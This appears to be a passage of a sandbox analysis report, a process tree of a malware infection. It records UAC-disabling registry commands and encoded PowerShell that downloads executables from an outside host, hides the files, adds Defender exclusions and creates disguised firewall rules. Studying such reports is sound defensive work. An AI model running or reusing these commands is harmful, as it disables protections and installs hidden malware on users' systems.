    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:4560
- - \??\c:\program files (x86)\internet explorer\iexplore.exe
    "c:\program files (x86)\internet explorer\iexplore.exe"
    3⤵
    - Adds policy Run key to start application
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    PID:2344
  - - C:\Windows\SysWOW64\cmd.exe
      /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3716
    - - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3288
  - - C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:4736
    - - C:\ProgramData\BraveShared\BraveSharedUpdater.exe
        
        "C:\ProgramData\BraveShared\BraveSharedUpdater.exe"
        5⤵
        
        PID:4524
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:5288
      - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        6⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        
        PID:5072
  - - C:\ProgramData\BraveCrashHandler.exe
      "C:\ProgramData\BraveCrashHandler.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Executes dropped EXE
      PID:1076
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4DYKHXVC.bat" "C:\ProgramData\BraveCrashHandler.exe" "
        5⤵
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAGkAZgAoAC0ATgBvAHQAIAAkACgAJAAoAHcAaABvAGEAbQBpACkAIAAtAGUAcQAgACIAbgB0ACAAYQB1AHQAaABvAHIAaQB0AHkAXABzAHkAcwB0AGUAbQAiACkAKQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAZgBhAGwAcwBlAAoACgAgACAAIAAgAGkAZgAgACgALQBOAG8AdAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQAgAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBWAGUAcgBiACAAUgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlAAoAIAAgACAAIAAgACAAIAAgAEUAeABpAHQACgAgACAAIAAgAH0ACgAKACAAIAAgACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAA9ACAAJAAoAEcAZQB0AC0AQwBvAG0AbQBhAG4AZAAgAFAAcwBFAHgAZQBjACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIAAnAGkAZwBuAG8AcgBlACcAKQAuAFMAbwB1AHIAYwBlACAACgAgACAAIAAgAGkAZgAoACQAcABzAGUAeABlAGMAXwBwAGEAdABoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAPQAgACIAIAAtAGkAIAAtAHMAIABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIABgACIAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4ATQB5AEMAbwBtAG0AYQBuAGQALgBQAGEAdABoACAAKwAgACIAYAAiACAAIgAgACsAIAAkAE0AeQBJAG4AdgBvAGMAYQB0AGkAbwBuAC4AVQBuAGIAbwB1AG4AZABBAHIAZwB1AG0AZQBuAHQAcwAgAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABlAHgAaQB0AAoAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgAH0ACgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAJABJAHMAUwB5AHMAdABlAG0AIAA9ACAAJAB0AHIAdQBlAAoAfQAKAAoANgA3AC4ALgA5ADAAfABmAG8AcgBlAGEAYwBoAC0AbwBiAGoAZQBjAHQAewAKACAAIAAgACAAJABkAHIAaQB2AGUAIAA9ACAAWwBjAGgAYQByAF0AJABfAAoAIAAgACAAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgAkACgAJABkAHIAaQB2AGUAKQA6AFwAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACoAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKAH0ACgA=
        6⤵
        
        PID:2240
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:2688
        
        C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe"
        7⤵
        
        PID:4848
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAZgBpAGwAZQBzAFQAbwBDAGgAZQBjAGsAIAA9ACAAQAAoAAoAIAAgACAAIABAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiADsAIABVAHIAbAA9ACIAaAB0AHQAcABzADoALwAvAHMAagBjADEALgB2AHUAbAB0AHIAbwBiAGoAZQBjAHQAcwAuAGMAbwBtAC8AYwBmAGMAYgA2ADkAZgBmAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AFAAYQB0AGgAPQAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgA7ACAAVQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBzAGoAYwAxAC4AdgB1AGwAdAByAG8AYgBqAGUAYwB0AHMALgBjAG8AbQAvAGMAZgBjAGIANgA5AGYAZgAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoACQBAAHsAUABhAHQAaAA9ACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBAFwAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAuAGUAeABlACIAOwAgAFUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AcwBqAGMAMQAuAHYAdQBsAHQAcgBvAGIAagBlAGMAdABzAC4AYwBvAG0ALwBjAGYAYwBiADYAOQBmAGYALwBTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgB9AAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlACAAaQBuACAAJABmAGkAbABlAHMAVABvAEMAaABlAGMAawApACAAewAKACAAIAAgACAAaQBmACAAKAAtAE4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQAuAFAAYQB0AGgAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQApACAAewAKACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAGYAaQBsAGUALgBVAHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQAuAFAAYQB0AGgACgAgACAAIAAgAH0ACgAgACAAIAAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZgBpAGwAZQAuAFAAYQB0AGgAKQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAfQAKAAoAJABhAGQAZABpAHQAaQBvAG4AYQBsAEYAaQBsAGUAcwBUAG8ASABpAGQAZQAgAD0AIABAACgACgAJACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAbQB5AHMAdAAtAGwAYQB1AG4AYwBoAGUAcgAtAGEAbQBkADYANAAuAGUAeABlACIALAAKACAAIAAgACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAsAAoACQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiACwACgAJACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGYAaQBsAGUAUABhAHQAaAAgAGkAbgAgACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAGkAbABlAHMAVABvAEgAaQBkAGUAKQAgAHsACgAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAUABhAHQAaAAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgAKACQAYQBkAGQAaQB0AGkAbwBuAGEAbABGAG8AbABkAGUAcgBzAFQAbwBIAGkAZABlACAAPQAgAEAAKAAKAAkAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAFAAcgBpAHYAYQB0AGUAIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AIgAsAAoAIAAgACAAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AbgBvAGQAZQAiAAoAKQAKAAoAZgBvAHIAZQBhAGMAaAAgACgAJABmAGkAbABlAFAAYQB0AGgAIABpAG4AIAAkAGEAZABkAGkAdABpAG8AbgBhAGwARgBvAGwAZABlAHIAcwBUAG8ASABpAGQAZQApACAAewAKACAAIAAgACAAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZgBpAGwAZQBQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACAAewAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgBpAGwAZQBQAGEAdABoACkALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACAAIAAgACAAfQAKAH0ACgA=
        6⤵
        Blocklisted process makes network request
        
        PID:848
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:2944
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBHAHIAbwB1AHAAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAEUAVQBMAEEAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAIABFAFUATABBACIAIAAtAEcAcgBvAHUAcAAgACIATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwBlAGEAcgBjAGgAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvA